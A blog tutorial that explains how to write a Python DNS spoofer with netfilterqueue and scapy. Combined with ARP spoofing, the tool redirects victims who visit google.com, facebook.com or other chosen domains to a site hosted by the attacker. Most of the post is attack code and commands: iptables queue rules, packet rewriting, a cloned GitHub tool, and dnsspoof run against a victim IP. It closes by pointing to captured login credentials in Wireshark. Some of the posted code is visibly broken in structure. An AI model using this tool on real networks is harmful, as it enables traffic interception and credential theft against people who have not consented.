Open in app

Sign in

Write

Sign in

WRITING YOUR OWN DNS SPOOFER PROGRAM : Coding for Cyber Security Program №3.

Anandita
4 min readNov 2, 2020

1. INTERCEPTING THE REQUEST

How does a DNS SPOOFER work?

This is a Man-in-the middle attack so there will be three entities :

  1. The victim
  2. The attacker ( I am using Kali Linux 2020.3)
  3. The Access Point/Gateway

The victim sends requests to the Access Point, the attacker sniffs them and modifies them and send the modified malicious request to the Access Point on behalf of the victim. The attacker does this by creating a queue of packets, storing all the requests, modifying them using a program and then sending them to the Access Point.

Similarly, the responses of the Access Point are stored in a queue, modified by the attacker using a program and then sent to the victim.

We will use the netfilterqueue python module to access the packets matched by the iptables rule. Run the following command in the terminal to install netfilterqueue.

# pip install netfilterqueue

Creating a dictionary containing the Domain names to spoof and the local IP of the attacker machine.

hosts = {
    b"www.google.com.": "10.0.2.15",
    b"google.com.": "10.0.2.15",
    b"facebook.com.": "10.0.2.15"}
  1. We can accept the packets using the following code.
import netfilterqueue
# accepting the packet  
def pkt_process(packet):
    print(packet)
    packet.accept()
  
    q = netfilterqueue.NetfilterQueue()
    q.bind(0, pkt_process)
    q.run()

2. or drop them -

import netfilterqueue
# dropping the packet
def pkt_process(packet):
    print(packet)
    packet.drop()
q = netfilterqueue.NetfilterQueue()
q.bind(0, pkt_process)
q.run()

We will choose to accept the requests, and now working with the requests and responses. We use DNSRR (Resource record) to edit the request and DNSQR (Question Record) to edit the Response.

# handling requests and responses
def pkt_process(packet):
    scapy_packet = scapy.IP(packet.get_payload())
    if scapy_packet.haslayer(scapy.DNSRR):
        print("[Before Modification ]:", scapy_packet.summary())
        try:
            scapy_packet = modify_packet(scapy_packet)
        except IndexError:
            pass
        print("[After Modification ]:", scapy_packet.summary())
        packet.set_payload(bytes(scapy_packet))
    packet.accept()

2. MODIFICATION OF PACKETS

We need to modify the request and in order to do that, we will be running the following code :

# modifying the results
def modify_packet(packet):
    qname = packet[scapy.DNSQR].qname
    if qname not in hosts:
        print("Invalid DNS Host:", qname)
        return packet
    packet[scapy.DNS].an = scapy.DNSRR(rrname=qname, rdata=hosts[qname])
    packet[scapy.DNS].ancount = 1

Some of the fields are to be deleted from the packet as they co-relate to the original request. So, we will be using scapy module to delete them from the scapy packet that e have captured and modify them with new values of the modified packet.

# removing some fields so that scapy can recalculate them
del packet[scapy.IP].len
del packet[scapy.IP].chksum
del packet[scapy.UDP].len
del packet[scapy.UDP].chksum
return packet

Import os module and use it to run the iptables command :

import os
QUEUE_NUM = 123
# insert the iptables FORWARD rule
os.system("iptables -I FORWARD -j NFQUEUE --queue-num {}".format(QUEUE_NUM))
q = NetfilterQueue()
try:
    q.bind(QUEUE_NUM, pkt_process)
    q.run()
except KeyboardInterrupt:
    os.system("iptables --flush")

Our code will look like this after performing all the above steps :

USING A DNS SPOOFER :

Step 1 : In order to use dns spoofer program, you need to run ARP SPOOFER (explained in the previous article).

https://an4ndita.medium.com/write-your-own-arp-spoofer-program-in-python-272b2c962dff

Step 2 : While ARP SPOOF is running in one terminal, open another terminal and run DNS SPOOF with the help of either of the following methods :

  1. You can use my GITHUB CODE :
# pip install netfilterqueue
# service apache2 start
# git clone https://github.com/An4ndita/dns-spoof
# cd dns-spoof
# mousepad dns.py

Edit line number 5, 6, 7 and follow the following format to enter your own domain name to be spoofed parallel to the IP of the attacker machine:

b”example.com” : “Your IP”

Now save it and run the following command :

# python3 dns.py

When the victim will surf the mentioned web pages, he will be able to see the website hosted by the attacker instead of the legitimate website.

2. You can also use the dnspoof tool inbuilt in kali linux for this purpose. Follow the following steps to use dnsspoof :

Create a file named spoofhost.txt and edit the file in the following format and save it:

<attacker’s ip> <Domain to be spoofed>

# mousepad /etc/spoofhost.txt10.0.2.15 mail*
10.0.2.15 www*
10.0.2.15 www.example.*
10.0.2.15 *.example.com

Run the following commands :

# echo 1 > /proc/sys/net/ipv4/ip_forward (enable port forwarding)
# dnsspoof -f  spoofhost.txt host  10.0.2.4  and  udp  port 53

(10.0.2.4 is IP address of the victim machine)

Now you can see the results using wireshark if you have spoofed a website that accepts login credentials.

Thanks for reading. Hope that you find it useful 🙂🙂

DNS
Coding
Cybersecurity
Python
Github

--

--

Anandita

Written by Anandita

57 Followers

Cyber Security Enthusiast

Help

Status

About

Careers

Blog

Privacy

Terms

Text to speech

Teams